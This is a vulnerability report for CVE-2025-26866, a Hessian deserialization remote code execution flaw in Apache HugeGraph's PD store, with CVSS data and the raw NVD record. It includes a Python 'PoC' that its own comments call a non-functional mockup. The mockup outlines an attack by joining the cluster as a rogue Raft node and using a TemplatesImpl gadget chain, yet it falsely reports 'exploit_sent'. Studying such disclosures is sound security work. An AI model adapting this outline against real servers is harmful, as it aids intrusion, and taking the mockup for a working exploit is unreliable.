Security Vulnerability Report
CVE-2025-26866 CVSS 8.8 HIGH

CVE-2025-26866

Published: 2025-12-12 10:15:49
Last Modified: 2025-12-29 17:20:58

Description

A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:hugegraph:*:*:*:*:*:*:*:* - VULNERABLE
Apache HugeGraph >= 1.0.0 and < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import json

# CVE-2025-26866 PoC - Hessian Deserialization RCE in Apache HugeGraph PD Store
# This PoC demonstrates the concept of exploiting Hessian deserialization vulnerabilities.
# It is a mockup: it builds a description of the payload and prints it, but never
# produces real Hessian bytes and never sends a request to any server.


class ExploitPayload:
    """
    Malicious payload for Hessian deserialization attack
    Note: This is for educational and authorized testing purposes only
    """

    def __init__(self, command):
        self.command = command

    def build_malicious_raft_node(self):
        """
        Build a malicious Raft node configuration to join the cluster
        """
        # Malicious node configuration with crafted IP (placeholder values only)
        malicious_config = {
            'node_id': 'malicious-node-001',
            'ip': 'attacker-controlled-ip',
            'port': 8299,
            'raft_port': 8300,
            'cluster_id': 'target-cluster-id'
        }
        return malicious_config

    def create_hessian_payload(self):
        """
        Create malicious Hessian serialized payload
        In real attack, this would contain gadget chains like:
        - TemplatesImpl with malicious bytecode
        - SpringBeanObjectInputStream with EL injection
        - CommonCollections chain
        """
        # Simplified representation of malicious Hessian data; these two values
        # are illustrative and are not used to build the returned dict
        hessian_magic = b'\x00\x04'  # Hessian 2.0 magic header
        malicious_class = b'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'
        malicious_bytecode = self._generate_evil_bytecode()
        payload = {
            'type': 'hessian_serialization',
            'class': 'TemplatesImpl',
            'bytecode': base64.b64encode(malicious_bytecode).decode(),
            'gadget': 'TemplatesImpl.getOutputProperties()'
        }
        return payload

    def _generate_evil_bytecode(self):
        """
        Generate malicious bytecode for code execution
        """
        # In actual exploit, this would be valid Java bytecode
        # that executes system commands; here it is only the class-file
        # magic number followed by the command string
        return b'\xca\xfe\xba\xbe' + self.command.encode()

    def exploit(self, target_url):
        """
        Execute the exploit against target HugeGraph server
        """
        # Step 1: Join cluster with malicious Raft node
        raft_join_url = f"{target_url}/api/v1/raft/join"
        malicious_node = self.build_malicious_raft_node()

        # Step 2: Send malicious Hessian serialized data
        hessian_payload = self.create_hessian_payload()

        # Step 3: Trigger deserialization via PD store operation
        exploit_url = f"{target_url}/api/v1/pd/store/deserialize"

        # The URLs and node config above are only constructed; no HTTP request is made
        print(f"[+] Target: {target_url}")
        print("[+] Sending malicious Raft node configuration...")
        print(f"[+] Payload: {json.dumps(hessian_payload, indent=2)}")

        return {
            'status': 'exploit_sent',
            'target': target_url,
            'payload': hessian_payload
        }


if __name__ == '__main__':
    # Configuration
    target = 'http://target-hugegraph-server:8090'
    # Create exploit instance
    exploit = ExploitPayload('whoami')
    # Execute
    result = exploit.exploit(target)
    print(f"\n[+] Exploit sent: {result}")
```

References

https://github.com/apache/incubator-hugegraph/pull/2735 (Issue Tracking, Patch)
https://lists.apache.org/thread/ko8jkwbjbb99m45pg4sgo5xsm8gx9nsq (Mailing List)
http://www.openwall.com/lists/oss-security/2025/12/09/1 (Mailing List)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-26866",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T10:15:49.053",
    "lastModified": "2025-12-29T17:20:58.370",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks.\n\n\n\n\nUsers are recommended to upgrade to version 1.7.0, which fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-502"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:hugegraph:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.0.0",
                "versionEndExcluding": "1.7.0",
                "matchCriteriaId": "B9C85CC8-1E1D-46F2-BB0C-9A85C78347C8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/apache/incubator-hugegraph/pull/2735",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://lists.apache.org/thread/ko8jkwbjbb99m45pg4sgo5xsm8gx9nsq",
        "source": "[email protected]",
        "tags": ["Mailing List"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/12/09/1",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List"]
      }
    ]
  }
}
```